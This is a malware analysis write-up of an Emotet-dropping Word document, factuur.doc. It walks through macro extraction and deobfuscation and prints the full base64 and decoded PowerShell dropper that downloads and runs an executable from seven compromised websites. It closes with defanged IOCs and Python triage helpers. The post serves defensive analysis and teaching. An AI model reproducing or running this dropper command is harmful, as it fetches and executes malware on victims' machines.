Malicious Microsoft Office documents are one of the most common infection vectors. Usually received via email, they are often the first step in compromising a system. In this article, I want to show how this is usually done and share my analysis methods with you.
Initial assessment
Context
This file was detected as an attachment of numerous received emails. It was blocked by the email gateway.
Its name was factuur.doc, which means “invoice” in Dutch, a well-known disguise for malware droppers.
- Name: factuur.doc
- SHA256: 1adb160f0d40cb4f8e821fbc93c4f6289cc5d023584145904fa40838a329e661
- Context: attached to numerous received emails
- Antivirus Detection: dropper for Emotet
File type
First, let’s confirm what kind of file we are dealing with.
$ file factuur.doc
factuur.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Numquam., Author: Enzo Poirier, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Aug 26 12:53:00 2020, Last Saved Time/Date: Wed Aug 26 12:53:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0
This is a Microsoft Word document.
Note that this is a very small document: 4 words, 1 page. Typical of phishing documents.
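The same identification can be scripted when the file command is not at hand. Below is a minimal Python sketch, assuming it is enough to compare the first 8 bytes against the Compound File Binary signature. The helper names looks_like_ole and is_ole_file are made up for this illustration and do not belong to any tool.

```python
# Signature found at offset 0 of every Compound File Binary (OLE2) file.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def looks_like_ole(header: bytes) -> bool:
    """Return True if the leading bytes match the OLE2 signature."""
    return header[:8] == OLE_MAGIC


def is_ole_file(path: str) -> bool:
    """Read the first 8 bytes of a file and test them (hypothetical helper)."""
    with open(path, "rb") as handle:
        return looks_like_ole(handle.read(8))
```

A match only says that the container is OLE2. It does not say whether the content is a Word document or whether it holds macros.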
The most common dangers in this type of document are either URLs leading to fake authentication forms to steal credentials or macros attempting to drop a payload on the system.
Suspicious elements
A quick look at the output of the oledump command shows that 2 streams of the document contain macros, visible with the letter M next to their stream ID: stream 8 and stream 9.
$ oledump.py factuur.doc
1: 114 '\x01CompObj'
2: 352 '\x05DocumentSummaryInformation'
3: 424 '\x05SummaryInformation'
4: 7035 '1Table'
5: 136577 'Data'
6: 524 'Macros/PROJECT'
7: 92 'Macros/PROJECTwm'
8: M 1340 'Macros/VBA/Lvenx3oasyi13'
9: M 14563 'Macros/VBA/Zoaes60ntol8thq'
10: 14994 'Macros/VBA/_VBA_PROJECT'
11: 1540 'Macros/VBA/__SRP_0'
12: 106 'Macros/VBA/__SRP_1'
13: 304 'Macros/VBA/__SRP_2'
14: 103 'Macros/VBA/__SRP_3'
15: 867 'Macros/VBA/dir'
16: 97 'Macros/Zoaes60ntol8thq/\x01CompObj'
17: 299 'Macros/Zoaes60ntol8thq/\x03VBFrame'
18: 510 'Macros/Zoaes60ntol8thq/f'
19: 112 'Macros/Zoaes60ntol8thq/i05/\x01CompObj'
20: 44 'Macros/Zoaes60ntol8thq/i05/f'
21: 0 'Macros/Zoaes60ntol8thq/i05/o'
22: 112 'Macros/Zoaes60ntol8thq/i07/\x01CompObj'
23: 44 'Macros/Zoaes60ntol8thq/i07/f'
24: 0 'Macros/Zoaes60ntol8thq/i07/o'
25: 25448 'Macros/Zoaes60ntol8thq/o'
26: 4096 'WordDocument'
Note: other objects are defined in the Macros container. We will see later on how they are used.
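When many samples have to be triaged, spotting the M flag by eye gets tedious. The sketch below parses a text listing like the one above and keeps the streams flagged M. It assumes the listing keeps the layout shown here (index, optional one-letter flag, size, quoted name). The regular expression and the function name macro_streams are assumptions of mine, not part of oledump.

```python
import re

# A few lines copied from the listing above.
LISTING = """\
  7:        92 'Macros/PROJECTwm'
  8: M    1340 'Macros/VBA/Lvenx3oasyi13'
  9: M   14563 'Macros/VBA/Zoaes60ntol8thq'
 10:     14994 'Macros/VBA/_VBA_PROJECT'
"""

# index, optional single-character flag, size, quoted stream name
LINE_RE = re.compile(r"^\s*(\d+):\s+(?:([A-Za-z!])\s+)?(\d+)\s+'(.*)'\s*$")


def macro_streams(listing):
    """Return (index, size, name) for every stream flagged with 'M'."""
    found = []
    for line in listing.splitlines():
        match = LINE_RE.match(line)
        if match and match.group(2) == "M":
            found.append((int(match.group(1)), int(match.group(3)), match.group(4)))
    return found


for index, size, name in macro_streams(LISTING):
    print(index, size, name)
```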
Stage 1: An office document with VBA macros
Content extraction
Let’s dump the two macro streams we found in the previous part to dedicated files in order to analyze them.
$ oledump.py -s 8 -v factuur.doc > Lvenx3oasyi13.vba
$ oledump.py -s 9 -v factuur.doc > Zoaes60ntol8thq.vba
Entry point
The Lvenx3oasyi13 stream (stream 8) defines a Document_open() subroutine, which is run each time the document is opened in Microsoft Word.
All this function does is call another function, X0yzd2pcuqu6rgv7z, defined by the other stream Zoaes60ntol8thq (stream 9).
Code structure
The Zoaes60ntol8thq stream contains 189 lines of obfuscated Visual Basic code.
Let’s try to understand how it is structured.
I usually insert blank lines between functions to get a better understanding of how the different parts of the code interact with each other. We can now see that this stream defines 4 functions:
- X0yzd2pcuqu6rgv7z (the function called from the entry point)
- Rbvfavx90b1xyru_ld
- E_xqabv70nlkt
- Pr2zintnwof18susdt
Obfuscation patterns
Looking more closely at the code allows us to recognize some repetitive obfuscation patterns using math operations. Most of the time in obfuscated macros, this is just noise and has no influence on the result. Let’s check that it is the case here.
For example, the variable kgwv13T is set multiple times to some numerical value, but it is never read anywhere else (Ctrl+F is your friend).
Let’s remove all lines defining kgwv13T!
The same reasoning also works for the variables EAIg, wDXZ4 and AYOZk77j. Let’s remove them too.
Note that each statement is now preceded by On Error Resume Next. Let’s remove these lines for readability, keeping in mind that an error in one of those statements would not crash the entire macro.
About 30 lines of Visual Basic code remain. This is a lot easier to handle.
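The clean-up described above can be partly automated. The following Python sketch is deliberately conservative: it drops On Error Resume Next lines and purely numeric assignments to variables that are never read anywhere else. The VBA sample is made up for the illustration (only the name kgwv13T comes from the macro), and the regular expressions are assumptions that will not cover every VBA construct.

```python
import re

# Hypothetical VBA fragment imitating the noise seen in the macro.
SAMPLE = """\
On Error Resume Next
kgwv13T = 4021 + 17 * 3
On Error Resume Next
target = "winmgmts:" + suffix
On Error Resume Next
kgwv13T = (981 - 12) / 3
Set obj = CreateObject(target)
"""

# An assignment whose right-hand side contains only numbers and operators.
NUMERIC_ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*[\d\s+\-*/().]+$")
IDENT = re.compile(r"[A-Za-z_]\w*")


def strip_noise(source):
    """Remove error-handler lines and dead numeric assignments."""
    lines = [line for line in source.splitlines()
             if line.strip().lower() != "on error resume next"]

    # Collect every identifier that is read somewhere (VBA is case-insensitive).
    reads = set()
    for line in lines:
        match = NUMERIC_ASSIGN.match(line)
        # For numeric assignments, skip the target itself; otherwise be
        # conservative and count every identifier on the line as a read.
        body = line[match.end(1):] if match else line
        reads.update(name.lower() for name in IDENT.findall(body))

    kept = []
    for line in lines:
        match = NUMERIC_ASSIGN.match(line)
        if match and match.group(1).lower() not in reads:
            continue  # assigned a number, never read: noise
        kept.append(line)
    return "\n".join(kept)


print(strip_noise(SAMPLE))
```

Only numeric assignments are removed on purpose: a call such as CreateObject has side effects even when its result is never read, so those lines are kept.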
Let’s try to understand what it does.
Variables, functions and arguments
These functions heavily use obfuscation techniques such as undefined variables yielding default values, concatenations, conversions, numerical values decomposed in additions, data loaded from form fields…
Whenever possible, I try to use Microsoft Visual Basic to run the code after I placed some breakpoints at strategic positions. It is faster than manually looking for those values and rewriting each line to be human readable.
Even though I run it in a virtual machine, I do my best to avoid running unknown code, encrypted commands and so forth, because that is where the crispy (and risky) part resides.
Identifying dangerous parts and placing breakpoints
In order to choose the breakpoint positions, I identify the functions which can have side effects on the system or which “decrypt” data. I am particularly interested in the value of their arguments and in what they return. I generally treat functions which only “transform” data (decryption, deobfuscation, concatenation, computation…) as black boxes.
Here, I will consider the E_xqabv70nlkt function as a black box since it only trims, splits and joins values. I will also consider the Pr2zintnwof18susdt function as a black box since it only uses E_xqabv70nlkt to transform data it loaded from a form.
The other two functions use CreateObject with some currently obfuscated data, therefore I will closely look at their arguments and how data is deobfuscated around them.
Actually seeing what it does
The first 4 lines of X0yzd2pcuqu6rgv7z are only building up the argument of the CreateObject call on the 5th line. Let’s pause the execution here to see what it creates.
A winmgmts:win32_Process object! It will allow the macro to interact with the process creation API of Windows. It is not used right away, but only in the last line of the function.
The next 3 lines are only building up the argument of the Rbvfavx90b1xyru_ld function. Let’s break here and see what it takes as an input.
The variable Mla0zvl2gwew1 now contains the value winmgmts:win32_ProcessstartuP. The function Rbvfavx90b1xyru_ld then instantiates this object, sets its ShowWindow attribute to 0 (as the debugger confirms), and returns it.
In a nutshell, it just created an object containing process creation options/flags specifying that the window of the created process will be hidden from the user.
The last line of X0yzd2pcuqu6rgv7z defines an array with 3 elements. The array elements are evaluated sequentially. This is a way to obfuscate a sequence of instructions. Some of them are useless, like the first and the last elements, which only define strings. But the second element actually calls a function which performs an action.
The full function call is Xelc5tzs07v5p5d.Create(Pr2zintnwof18susdt, Lge51wtl_ks4aw, X3gj911lgo6y). If we replace the variables that we already know by some pseudo-code, it becomes Process.Create(Pr2zintnwof18susdt, NO_ARGUMENTS, HIDE_WINDOW). The first argument is the process that it launches. Let’s decrypt it by running the macro a little further.
The local variable panel shows that it is an encoded PowerShell command. However, the value is truncated by the viewer. When this happens, I edit the macro and use the Debug.Print function to write the value to the “Execution” panel (the Immediate window in English versions of the editor).
The value returned by Pr2zintnwof18susdt is the following base64-encoded PowerShell command:
powersheLL -e JABYAG8AdgBmAHYAMgBuAD0AKAAnAEEAMwAnACsAKAAnAGcAZwAzACcAKwAnADgAdQAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAVABlAG0AUABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAEUAYwBUAE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIAYABpAGAAVAB5AHAAYABSAG8AdABPAGMAYABvAGwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAcwAxADIAJwArACcALAAnACkAKwAnACAAdAAnACsAKAAnAGwAcwAxACcAKwAnADEALAAgAHQAJwApACsAJwBsAHMAJwApADsAJABGADQAcABfAHoAeQBhACAAPQAgACgAKAAnAFUAYQAnACsAJwBtAHIAcgAnACkAKwAnAGcAdAAnACkAOwAkAEIAcgA3AG4ANQBjAHIAPQAoACgAJwBRACcAKwAnAGQAawAnACkAKwAoACcAcAAnACsAJwBpAHEAZgAnACkAKQA7ACQASwBrADUAZQByAHcAdwA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACgAJwBjACcAKwAnAEoAZAB3AG8AJwArACcAcgBkAGMAJwArACcASgAnACkAKwAnAGQAJwArACgAJwAyADAAMQAnACsAJwA5AGMAJwApACsAJwBKACcAKwAnAGQAJwApAC4AIgBSAEUAYABQAGAATABhAEMAZQAiACgAKABbAEMAaABhAFIAXQA5ADkAKwBbAEMAaABhAFIAXQA3ADQAKwBbAEMAaABhAFIAXQAxADAAMAApACwAJwBcACcAKQApACsAJABGADQAcABfAHoAeQBhACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQAWAA5AGQAegBwAHAANAA9ACgAKAAnAEcAYwBoACcAKwAnAHoAbQAnACkAKwAnAHUANAAnACkAOwAkAEQAbwAzADEAMgBsAGwAPQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBlAGIAYwBsAGkARQBOAHQAOwAkAEkAeQBiAGMAZwBpAGIAPQAoACgAJwBoAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAKAAnAC8AJwArACcALwBpAG4AbQAnACkAKwAnAGUAJwArACcAZAAnACsAJwAuAHYAJwArACgAJwBuAC8AdwAnACsAJwBwAC0AJwApACsAKAAnAGMAbwBuAHQAZQAnACsAJwBuAHQAJwApACsAKAAnAC8AJwArACcAQgBUACcAKQArACcAQQAnACsAJwB2AGgAJwArACcAdAAnACsAKAAnAEEAJwArACcALwAqAGgAdAB0ACcAKQArACgAJwBwACcAKwAnADoALwAvACcAKQArACcAcwAnACsAJwBvACcAKwAoACcAZgAnACsAJwB0AHAAJwArACcAYQByAGsALgBjACcAKQArACgAJwBvAG0ALgBiAHIAJwArACcALwBhACcAKQArACgAJwBkAG0AJwArACcAaQAnACkAKwAoACcAbgBpAHMAdAAnACsAJwByACcAKQArACgAJwBhACcAKwAnAHQAbwByACcAKQArACgAJwAvAHgAdwBGAHYAaQBsACcAKwAnADYAJwArACcAcgB6AHoAawAnACkAKwAnAGkAJwArACcAMAAyACcAKwAnADUAJwArACcANAAnACsAJwAvACcAKwAnACoAaAAnACsAJwB0AHQAJwArACgAJwBwADoALwAvAGIAJwArACcAbAAnACsAJw
B1AGUAcAByACcAKQArACcAaQBuACcAKwAoACcAdAAuAHMAJwArACcAZAAnACkAKwAnAC8AJwArACcAYwAnACsAJwA4AGUAJwArACcAbAAnACsAJwB4ADMAJwArACgAJwBvAC8AJwArACcAeAB2AE0AJwArACcAQgBaACcAKQArACgAJwBaAGIAJwArACcAQQBJACcAKQArACgAJwBBAG8AcQAvACoAaAB0AHQAJwArACcAcAAnACsAJwBzACcAKQArACgAJwA6AC8ALwB1AHAAdAAnACsAJwBlACcAKwAnAGMAJwApACsAKAAnAGgAbgAnACsAJwBvAGwAJwArACcAbwBnAHkAJwArACcALgBjACcAKQArACgAJwBvAG0ALgAnACsAJwBiAHIAJwApACsAKAAnAC8AJwArACcAcgBlACcAKQArACgAJwBkAGUAJwArACcAcABhACcAKQArACcAeQAnACsAKAAnAC8AaQBtAGcAJwArACcALwAnACkAKwAoACcAZAAnACsAJwBEAGkATwBFAC8AKgAnACkAKwAoACcAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAOgAvAC8AbQBhAHQAYQAnACsAJwBkAGUAJwArACcAYgAnACsAJwBlAG4AZgBpACcAKwAnAGMAYQAnACsAJwAuACcAKQArACcAYwBvACcAKwAnAG0ALwAnACsAKAAnAHAAZQByACcAKwAnAG0AYQBuACcAKwAnAGUAbgB0ACcAKQArACcAZQAnACsAKAAnAC8ASQBvACcAKwAnAEUAJwArACcAcwBYAG8AJwArACcASwBOAHMAJwArACcAUgBSAFEAJwApACsAKAAnAC8AJwArACcAKgBoACcAKwAnAHQAdABwADoAJwApACsAKAAnAC8ALwB0ACcAKwAnAGoAJwApACsAKAAnAHMAdABvACcAKwAnAHIAJwApACsAKAAnAGUALgBpAHIALwB3ACcAKwAnAHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AaQBuACcAKwAnAC8AbABjAFYAVwAnACsAJwByAGgAJwApACsAKAAnAGQAbwAnACsAJwB5AHcAdgAnACsAJwBmADgAeAAnACsAJwA4ADcAMQAyAC8AJwApACsAKAAnACoAaAB0AHQAJwArACcAcAA6AC8AJwApACsAKAAnAC8AJwArACcAZwBhAHIAZAAnACsAJwBlAG4ALQAnACkAKwAnAGMAZQAnACsAKAAnAG4AdABlAHIAJwArACcALgAnACsAJwByACcAKwAnAG8ALwB3AHAAJwApACsAKAAnAC0AYwBvACcAKwAnAG4AdAAnACkAKwAoACcAZQBuACcAKwAnAHQALwBkAGQAJwApACsAKAAnAFkAJwArACcAegBYAGMAYQBMAC8AJwApACkALgAiAFMAcABgAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVwA2AGQAZQA2AF8AZAA9ACgAJwBIAGUAJwArACcAdQB5ACcAKwAoACcAdwAnACsAJwBlAGUAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABTAHkAbgBnADUANAB3ACAAaQBuACAAJABJAHkAYgBjAGcAaQBiACkAewB0AHIAeQB7ACQARABvADMAMQAyAGwAbAAuACIARABPAHcATgBsAGAAbwBhAGAAZABmAEkAbABFACIAKAAkAFMAeQBuAGcANQA0AHcALAAgACQASwBrADUAZQByAHcAdwApADsAJABXAHkAdQB0AGMANQBsAD0AKAAnAFIAJwArACcAdgAnACsAKAAnAGQAMgA3ADMAJwArACcAMQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABLAGsANQBlAHIAdwB3ACkALgAiAGwAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMg
AxADYAOQA0ACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAEsAawA1AGUAcgB3AHcAKQA7ACQATwB1AG4AbQBiADQAOQA9ACgAJwBFACcAKwAoACcAbwBrACcAKwAnADcAZgB6ACcAKwAnAGYAJwApACkAOwBiAHIAZQBhAGsAOwAkAFcANQB5AGEAagB4AGMAPQAoACgAJwBNACcAKwAnAHAAawAnACkAKwAoACcAOAAnACsAJwBuAGMAdAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATABtAGIAdQAyAF8ANQA9ACgAJwBRAHkAJwArACgAJwA5AHAAJwArACcAYQAyACcAKQArACcAdAAnACkA
Once decoded (using the base64 -d command or CyberChef, whichever you prefer), the exact command is:
$Xovfv2n=('A3'+('gg3'+'8u'));.('ne'+'w-i'+'tem') $ENV:TemP\WOrD\2019\ -itemtype diREcTOrY;[Net.ServicePointManager]::"SecUr`i`Typ`RotOc`ol" = ('t'+('ls12'+',')+' t'+('ls1'+'1, t')+'ls');$F4p_zya = (('Ua'+'mrr')+'gt');$Br7n5cr=(('Q'+'dk')+('p'+'iqf'));$Kk5erww=$env:temp+((('c'+'Jdwo'+'rdc'+'J')+'d'+('201'+'9c')+'J'+'d')."RE`P`LaCe"(([ChaR]99+[ChaR]74+[ChaR]100),'\'))+$F4p_zya+('.'+('e'+'xe'));$X9dzpp4=(('Gch'+'zm')+'u4');$Do312ll=.('n'+'ew'+'-object') neT.webcliENt;$Iybcgib=(('htt'+'p')+':'+('/'+'/inm')+'e'+'d'+'.v'+('n/w'+'p-')+('conte'+'nt')+('/'+'BT')+'A'+'vh'+'t'+('A'+'/*htt')+('p'+'://')+'s'+'o'+('f'+'tp'+'ark.c')+('om.br'+'/a')+('dm'+'i')+('nist'+'r')+('a'+'tor')+('/xwFvil'+'6'+'rzzk')+'i'+'02'+'5'+'4'+'/'+'*h'+'tt'+('p://b'+'l'+'uepr')+'in'+('t.s'+'d')+'/'+'c'+'8e'+'l'+'x3'+('o/'+'xvM'+'BZ')+('Zb'+'AI')+('Aoq/*htt'+'p'+'s')+('://upt'+'e'+'c')+('hn'+'ol'+'ogy'+'.c')+('om.'+'br')+('/'+'re')+('de'+'pa')+'y'+('/img'+'/')+('d'+'DiOE/*')+('h'+'tt')+('p://mata'+'de'+'b'+'enfi'+'ca'+'.')+'co'+'m/'+('per'+'man'+'ent')+'e'+('/Io'+'E'+'sXo'+'KNs'+'RRQ')+('/'+'*h'+'ttp:')+('//t'+'j')+('sto'+'r')+('e.ir/w'+'p-'+'a')+('dmin'+'/lcVW'+'rh')+('do'+'ywv'+'f8x'+'8712/')+('*htt'+'p:/')+('/'+'gard'+'en-')+'ce'+('nter'+'.'+'r'+'o/wp')+('-co'+'nt')+('en'+'t/dd')+('Y'+'zXcaL/'))."Sp`LIt"([char]42);$W6de6_d=('He'+'uy'+('w'+'ee'));foreach($Syng54w in $Iybcgib){try{$Do312ll."DOwNl`oa`dfIlE"($Syng54w, $Kk5erww);$Wyutc5l=('R'+'v'+('d273'+'1'));If ((.('G'+'et-'+'Item') $Kk5erww)."leN`gTh" -ge 21694) {.('I'+'nvo'+'ke-I'+'tem')($Kk5erww);$Ounmb49=('E'+('ok'+'7fz'+'f'));break;$W5yajxc=(('M'+'pk')+('8'+'nct'))}}catch{}}$Lmbu2_5=('Qy'+('9p'+'a2')+'t')
This is an obfuscated PowerShell command, which we will treat as the second stage of the dropper.
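The decoding step can also be reproduced in a few lines of Python. The value passed to the -e (EncodedCommand) switch is base64 over UTF-16LE text, so a plain base64 decode leaves a null byte after every ASCII character, and the second decode removes them. This is a minimal sketch: the function name decode_encoded_command is mine, and the re-padding is only there in case a copy-paste dropped the trailing = characters.

```python
import base64


def decode_encoded_command(b64: str) -> str:
    """Decode the argument of PowerShell's -e / -EncodedCommand switch."""
    # Restore any '=' padding lost while copying the value around.
    padded = b64 + "=" * (-len(b64) % 4)
    # PowerShell expects the command as UTF-16LE before base64 encoding.
    return base64.b64decode(padded).decode("utf-16-le")


# First 24 characters of the payload above.
print(decode_encoded_command("JABYAG8AdgBmAHYAMgBuAD0A"))  # $Xovfv2n=
```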
Stage 2: obfuscated powershell command
This PowerShell script is lightly obfuscated and mainly relies on string concatenation. You just need to spend a little time reconstructing the strings. If you are familiar with tools such as sed, they can make this step very fast.
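As an alternative to sed, here is a small Python sketch of the same idea. It repeatedly merges adjacent single-quoted literals joined by +, unwraps parentheses that contain a single literal, and finally drops the backticks that do not form a PowerShell escape sequence. It is a naive, regex-based approach with known limits: it assumes literals contain no quote characters and do not start with a +, and its output is meant for reading, not for running. The name simplify is mine.

```python
import re

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'ab'+'cd'
WRAPPED = re.compile(r"\(\s*('[^']*')\s*\)")          # ('abcd')
# A backtick followed by anything that is not a known escape letter.
TICK = re.compile(r"`([^0abefnrtuv])")


def simplify(script: str) -> str:
    """Collapse string concatenations until nothing changes any more."""
    previous = None
    while script != previous:
        previous = script
        script = CONCAT.sub(r"'\1\2'", script)   # 'ab'+'cd'  -> 'abcd'
        script = WRAPPED.sub(r"\1", script)      # ('abcd')   -> 'abcd'
    return TICK.sub(r"\1", script)


print(simplify("$Xovfv2n=('A3'+('gg3'+'8u'));"))
print(simplify('$Do312ll."DOwNl`oa`dfIlE"($Syng54w, $Kk5erww)'))
```

Running it on the whole decoded command should leave mostly variable names to rename by hand.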
Once the strings are readable, it is quite easy to rename the variables and clean up the code to get a good look at what it does.
It attempts to retrieve a payload from each of the 7 listed compromised websites in turn and drops it on the disk as the file %TEMP%\word\2019\Uamrrgt.exe. The dropper decides that it retrieved a valid payload by checking that the file size is at least 21694 bytes (the -ge comparison). It then runs the first payload that passes this check and stops.
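Three small tricks in the script are easy to verify by hand: the character codes that build the Replace marker, the split on character 42, and the size check. The Python sketch below mirrors them. The literals are copied from the decoded command, except that only two of the 7 URLs are included and they are kept defanged. The variable and function names are mine.

```python
# [ChaR]99+[ChaR]74+[ChaR]100 in the script builds the marker string.
marker = chr(99) + chr(74) + chr(100)

# The concatenated literal, with every marker swapped for a backslash.
folder = "cJdwordcJd2019cJd".replace(marker, "\\")
drop_path = "%TEMP%" + folder + "Uamrrgt" + ".exe"

# [char]42 is the separator between URLs (two defanged URLs stand in for the 7).
joined = ("hxxp://inmed[.]vn/wp-content/BTAvhtA/"
          "*hxxp://softpark.com[.]br/administrator/xwFvil6rzzki0254/")
urls = joined.split(chr(42))

MIN_SIZE = 21694  # threshold used with -ge in the script


def is_accepted(size_in_bytes: int) -> bool:
    """Mirror the dropper's check: the file must be at least MIN_SIZE bytes."""
    return size_in_bytes >= MIN_SIZE


print(marker, drop_path, len(urls))
```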
The job of the dropper stops here. The rest of the infection is done by the payload.
At the time of writing, two of these servers still serve the malicious payload.
Stage 3: payloads
The only two payloads that I managed to retrieve are different:
$ sha256sum *
89a801afdf70466f14d4deead8cbb9645a299d2b62e048bfa9ca2531796666c6 7Zo0813874054.exe
65ca99334b8660e9e4c47fc4380fbe37b20c5f406a22522ee8aeb9700089902b FceMssA008184881513166.exe
However, the difference is small:
$ diff <(xxd FceMssA008184881513166.exe) <(xxd 7Zo0813874054.exe)
20654,20657c20654,20657
< 0050ad0: 6c42 0000 b360 8aaa 78de 1665 4b6c f90d lB...`..x..eKl..
< 0050ae0: fd2a 0783 c6a8 1006 365f 4d64 6bbc b0db .*......6_Mdk...
< 0050af0: 8cd4 1e6b 6da5 5e37 e20c 85f8 fe11 9d67 ...km.^7.......g
< 0050b00: 30b2 d900 3400 3800 0000 0000 0000 0000 0...4.8.........
---
> 0050ad0: 6c42 0000 8497 e893 70b8 98c1 03d1 940e lB......p.......
> 0050ae0: da6e 9652 58ae c117 13b6 e37d 28cb 728d .n.RX......}(.r.
> 0050af0: 04db 55f7 31b5 d7bf 214e 56d8 2555 4368 ..U.1...!NV.%UCh
> 0050b00: 7abd 0c00 3400 3800 0000 0000 0000 0000 z...4.8.........
This might be done to create different file signatures to avoid detection. According to a quick look in IDA, these bytes are in the .rdata section, but no references to them were found.
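The xxd and diff comparison can also be done directly on the bytes, which gives exact offsets instead of 16-byte rows. Here is a minimal Python sketch, assuming both files have the same length (anything past the shorter file is ignored). The function name differing_ranges is mine.

```python
def differing_ranges(a: bytes, b: bytes) -> list:
    """Return (start, end) offsets, end exclusive, of runs where a and b differ."""
    ranges = []
    start = None
    for offset, (x, y) in enumerate(zip(a, b)):
        if x != y and start is None:
            start = offset                    # a new differing run begins
        elif x == y and start is not None:
            ranges.append((start, offset))    # the current run just ended
            start = None
    if start is not None:                     # run reaches the end of the data
        ranges.append((start, min(len(a), len(b))))
    return ranges


# Usage on the two payloads (file names as in the listing above):
# with open("FceMssA008184881513166.exe", "rb") as f1, \
#         open("7Zo0813874054.exe", "rb") as f2:
#     for start, end in differing_ranges(f1.read(), f2.read()):
#         print(hex(start), hex(end), end - start)
```

Going by the xxd output above, this should report a single run starting at offset 0x50ad4 and ending just after 0x50b02, but I have not run it against the actual files.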
Both of these payloads are detected as Emotet.
Conclusion
My analysis of this dropper ends here. I will keep the reverse engineering of the payload for another post, if I have time.
One of the reasons to analyze a dropper by hand like this, other than learning, is to make sure that there were no hidden capabilities. For example, we saw that 7 different websites are used by this dropper to retrieve a payload. A sandbox analysis might have only returned the first website.
Of course, there are tools and methods to do this faster, such as VBA emulators that retrieve the decrypted strings from the macros. In this specific case, since the macro itself did not include the “multiple C&C” logic, a sandbox would have shown the powershell process being spawned, and an analysis of the powershell command would have been sufficient to retrieve the list of all possible C&C domains. But we never know beforehand! :)
IOCs
factuur.doc
1adb160f0d40cb4f8e821fbc93c4f6289cc5d023584145904fa40838a329e661
%TEMP%\word\2019\Uamrrgt.exe
hxxp://inmed[.]vn/wp-content/BTAvhtA/
hxxp://softpark.com[.]br/administrator/xwFvil6rzzki0254/
hxxps://uptechnology.com[.]br/redepay/img/dDiOE/
hxxp://blueprint[.]sd/c8elx3o/xvMBZZbAIAoq/
hxxp://matadebenfica[.]com/permanente/IoEsXoKNsRRQ/
hxxp://tjstore[.]ir/wp-admin/lcVWrhdoywvf8x8712/
hxxp://garden-center[.]ro/wp-content/ddYzXcaL/
89a801afdf70466f14d4deead8cbb9645a299d2b62e048bfa9ca2531796666c6
7Zo0813874054.exe
65ca99334b8660e9e4c47fc4380fbe37b20c5f406a22522ee8aeb9700089902b
FceMssA008184881513166.exe
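The URLs above are defanged (hxxp and [.]) so that they cannot be clicked by accident. To feed them into a blocklist, they need to be turned back into hostnames. Here is a minimal Python sketch, assuming only these two defanging conventions are in use. The function names refang and hostname_of are mine.

```python
from urllib.parse import urlsplit


def refang(ioc: str) -> str:
    """Undo the hxxp / [.] defanging used in the list above."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


def hostname_of(ioc: str) -> str:
    """Extract the hostname of a defanged URL, e.g. for a DNS blocklist."""
    return urlsplit(refang(ioc)).hostname


print(hostname_of("hxxp://inmed[.]vn/wp-content/BTAvhtA/"))
```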